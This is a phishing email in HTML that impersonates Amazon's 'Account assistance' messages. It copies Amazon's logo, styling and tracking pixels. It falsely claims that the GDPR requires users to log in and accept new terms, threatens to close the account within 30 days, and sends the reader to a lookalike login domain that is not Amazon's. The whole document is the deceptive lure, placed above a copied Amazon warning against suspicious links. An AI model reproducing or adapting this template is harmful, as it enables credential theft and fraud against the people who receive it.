  <html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <style type="text/css">
body {
    margin:0;
    color:#333;
}

a {
    text-decoration:none;
    color:#006699;
	margin:0px;
	padding-bottom: 10px;
	font-size:25px;
    font-family: "arial", "sans-serif";
}

p {
    margin:0px;
}

img {
    border:0;
    margin:0;
}

/* container */
#container {
    width:540px;
    margin:0 auto;
}

#content {
    width:500px;
    margin:0 20px;
}

/* header */
#header {
    border-bottom:1px solid #eaeaea;
    padding-top:10px;
    padding-left:0px;
    padding-right:0px;
    padding-bottom:10px;
}

#title p{
    font-size:20px;
    font-family: "arial", "sans-serif";
}

#amazonLogo{
    width:107px;
    height:31px;
}

/* verification msg */
#verificationMsg {
    padding-left:0;
    padding-top:9px;
    padding-bottom:9px;
}

#verificationMsg p {
    font-size:14px;
    font-family: "arial", "sans-serif";
}

#verificationMsg .otp {
    font-size:18px;
    font-weight:bold;
    padding-top:18px;
}

/* account security */
#accountSecurity {
    padding-left:0;
    padding-top:9px;
    padding-bottom:9px;
}

#accountSecurity p {
    font-size:14px;
    font-family: "arial", "sans-serif";
}

/* closing */
#closing {
    padding-left:0;
    padding-top:9px;
    padding-bottom:9px;
}

#closing p {
    font-size:14px;
    font-family: "arial", "sans-serif";
}

    </style>
    <title></title>
  </head>
  <body><img width="1" height="1" src="https://www.amazon.ca/gp/r.html?C=2AFO8BPENOI53&M=urn:rtn:msg:2018091804121881793a191ebf4eef82d1e2372030p0na&R=CD112ITYKGWM&T=O&U=https%3A%2F%2Fimages-na.ssl-images-amazon.com%2Fimages%2FG%2F01%2Fnav%2Ftransp.gif&H=JCRZSBEKS9KGYANKASJGAVAAHBIA&ref_=pe_1812580_136961430_opens" />
  <table align="center" cellspacing="0" id="container" cellpadding="0">
    <tbody>
    <tr>
      <td>
        <table cellspacing="0" id="content" cellpadding="0">
          <tbody>
          <tr>
            <td id="header">
              <table cellspacing="0" cellpadding="0">
                <tbody>
                <tr>
                  <td width="250" id="logo">
<img src="https://images-na.ssl-images-amazon.com/images/G/01/x-locale/cs/te/logo._CB152417367_.png" id="amazonLogo"/>                  </td>
                  <td width="250" id="title" valign="top" align="right"><p>Account assistance</p></td>
                </tr>
                </tbody>
              </table>
            </td>
          </tr>

          <tr>
            <td id="verificationMsg">
              <p>In accordance with the GDPR, Amazon has taken steps to ensure that the personal data of all users are protected.</p>
			  <br>
			  <p>Under the new guidelines, you must log in to your account to accept the new terms and conditions.</p>
			  <br>
			  <p>Failure to do so within 30 days will result in your account being terminated.</p>
			  <br>
			  <a href="https://amazon.ayashii.info/">Click here to login</p>
            </td>
          </tr>

          <tr>
            <td id="accountSecurity">
              <p>Amazon takes your account security very seriously. Amazon will never email you and ask you to disclose or verify your Amazon password, credit card, or banking account number. If you receive a suspicious email with a link to update your account information, do not click on the link&mdash;instead, 
report the email to Amazon for investigation.

              </p>
            </td>
          </tr>

          <tr>
            <td id="closing">
              <p>We hope to see you again soon.
              </p>
            </td>
          </tr>
          </tbody>
        </table>
      </td>
    </tr>
    </tbody>
  </table>
  <img width="1" height="1" src="https://www.amazon.ca/gp/r.html?C=2AFO8BPENOI53&M=urn:rtn:msg:2018091804121881793a191ebf4eef82d1e2372030p0na&R=CD112ITYKGWM&T=E&U=https%3A%2F%2Fimages-na.ssl-images-amazon.com%2Fimages%2FG%2F01%2Fnav%2Ftransp.gif&H=9ID10RCBETNKFJXXXRCAAV76Q9AA&ref_=pe_1812580_136961430_open" /></body>
  </html>